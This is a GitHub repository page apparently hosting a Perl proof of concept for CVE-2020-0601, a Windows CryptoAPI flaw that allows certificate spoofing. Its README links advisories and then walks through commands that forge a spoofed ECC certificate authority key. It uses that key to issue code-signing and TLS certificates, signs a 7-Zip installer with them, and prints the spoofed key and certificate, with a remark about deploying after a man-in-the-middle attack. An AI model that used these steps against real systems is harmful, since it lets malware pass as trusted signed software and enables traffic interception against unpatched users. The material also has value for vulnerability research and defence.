Skip to content
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
Crypt32
MITM
logo
working_certs
EC.cer
README.md
openssl_cs.conf
openssl_tls.conf
shibazuki.pl

README.md

CVE-2020-0601

This is the Perl version of the script main.rb published from ollypwn who is here: https://github.com/ollypwn/CVE-2020-0601

  • Info:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601

https://www.guru3d.com/news-story/microsoft-patches-crypt32-dll-vulnerability-that-allows-certificate-spoofing.html

https://kb.cert.org/vuls/id/849224/

https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF


https://www.virustotal.com/gui/file/95597ed5ed579d4fe1e9a2177c29178038e4f837998bc058c94ede6ec55b7547/details

https://tehtris.com/en/cve-2020-0601-vulnerability-in-the-cryptoapi-of-windows-crypt32-dll/


Microsoft Servers: Create ECC CSR and Install ECC SSL Certificate

https://www.digicert.com/ecc-csr-creation-ssl-installation-microsoft.htm


Need to install:

cpan -i Crypt::OpenSSL::X509
cpan -i Crypt::PK::ECC

Example of a number of the ECC Certificate:


USAGE ON Linux default:

perl shibazuki.pl ./EC.cer > spoof.key

openssl req -new -x509 -key spoof.key -out spoof.crt

# Building

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [AU]:BG
State or Province Name (full name) [Some-State]:Sofee
Locality Name (eg, city) []:Sofee
Organization Name (eg, company) [Internet Widgits Pty Ltd]:sec
Organizational Unit Name (eg, section) []:sec 
Common Name (e.g. server FQDN or YOUR name) []:nu11secur1ty
Email Address []:tarator@abv.bg

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs

openssl x509 -req -in cert.csr -CA spoof.crt -CAkey spoof.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoof.crt -name "Code Signing" -out cert.p12

# install osslsigncode
    ```bash
    apt install osslsigncode
    # Info: https://en.wikipedia.org/wiki/PKCS_12
    ```

osslsigncode sign -pkcs12 cert.p12 -n "Signed by nu11secur1ty" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe


SSL/TLS

perl shibazuki.pl ./EC.cer > spoof.crt

perl shibazuki.pl ./EC.cer > spoof.key

openssl req -new -x509 -key spoof.key -out spoof.crt

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls

openssl x509 -req -in cert.csr -CA spoof.crt -CAkey spoof.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls
  • Create spoof certificate
perl shibazuki.pl EC.cer 
# Export
perl shibazuki.pl EC.cer > spoof.crt
perl shibazuki.pl EC.cer > spoof.key
  • Check
cat spoof.key

The output should be like this before created

-----BEGIN EC PRIVATE KEY-----
MIIBMgIBAQQBAaCB4zCB4AIBATAsBgcqhkjOPQEBAiEA/////wAAAAEAAAAAAAAA
AAAAAAD///////////////8wRAQg/////wAAAAEAAAAAAAAAAAAAAAD/////////
//////wEIFrGNdiqOpPns+u9VXaYhrxlHQawzFOw9jvOPD4n0mBLBEEEdFZqveAI
TciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oSwlYwaceemvGBdLcJ
KqCO1KEZz+oQaQIhAP////8AAAAA//////////+85vqtpxeehPO5ysL8YyVRAgEB
oUQDQgAEdFZqveAITciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oS
wlYwaceemvGBdLcJKqCO1KEZz+oQaQ==
-----END EC PRIVATE KEY-----

Deployment after MITM attack ;)

Already created, spoof cert:

-----BEGIN CERTIFICATE-----
MIIDyjCCA1GgAwIBAgIUfihb37ATaf2IXvn21ny2G/dkr2owCgYIKoZIzj0EAwIw
fDELMAkGA1UEBhMCQkcxCzAJBgNVBAgMAkJHMQ4wDAYDVQQHDAVTb2ZlZTEMMAoG
A1UECgwDc2VjMQwwCgYDVQQLDANzZWMxFTATBgNVBAMMDG51MTFzZWN1cjF0eTEd
MBsGCSqGSIb3DQEJARYOdGFyYXRvckBhYnYuYmcwHhcNMjAwMjA5MTQyMTQ2WhcN
MjAwMzEwMTQyMTQ2WjB8MQswCQYDVQQGEwJCRzELMAkGA1UECAwCQkcxDjAMBgNV
BAcMBVNvZmVlMQwwCgYDVQQKDANzZWMxDDAKBgNVBAsMA3NlYzEVMBMGA1UEAwwM
bnUxMXNlY3VyMXR5MR0wGwYJKoZIhvcNAQkBFg50YXJhdG9yQGFidi5iZzCCAbUw
ggFNBgcqhkjOPQIBMIIBQAIBATA8BgcqhkjOPQEBAjEA////////////////////
//////////////////////7/////AAAAAAAAAAD/////MGQEMP//////////////
///////////////////////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SY
jgVr4/gtGRgdnG7+gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvBGEExxEWKnYd
Vo6+uWJl1MPOtPDDMOyPbdduObzISauruONDeNWBBl3vx32fztazkHXeDLCQ3iO6
yNE+Z+AZqRuGMR5fNC3uF/0V+34nijKh6smPyX4Yyy87LEh6fab0AQesAjEA////
////////////////////////////x2NNgfQ3Ld9YGg2ySLCneuzsGWrMxSlzAgEB
A2IABMcRFip2HVaOvrliZdTDzrTwwzDsj23Xbjm8yEmrq7jjQ3jVgQZd78d9n87W
s5B13gywkN4jusjRPmfgGakbhjEeXzQt7hf9Fft+J4oyoerJj8l+GMsvOyxIen2m
9AEHrKNTMFEwHQYDVR0OBBYEFEPvcIe4nb/siBncxsRrdQ11NDMIMB8GA1UdIwQY
MBaAFEPvcIe4nb/siBncxsRrdQ11NDMIMA8GA1UdEwEB/wQFMAMBAf8wCgYIKoZI
zj0EAwIDZwAwZAIwPxsctDfDiQnQ8QJb1uoqfPh3ImrfA2GNteoDg0GYhyeLtImT
2dP6sXdVdy6qW4hoAjABMWsvu+e4hL8NJGApBpNTEMtRzYN+oRVzIR6r10VjKx5J
BO/cu9oLAKMc3RAeTUg=
-----END CERTIFICATE-----
You can’t perform that action at this time.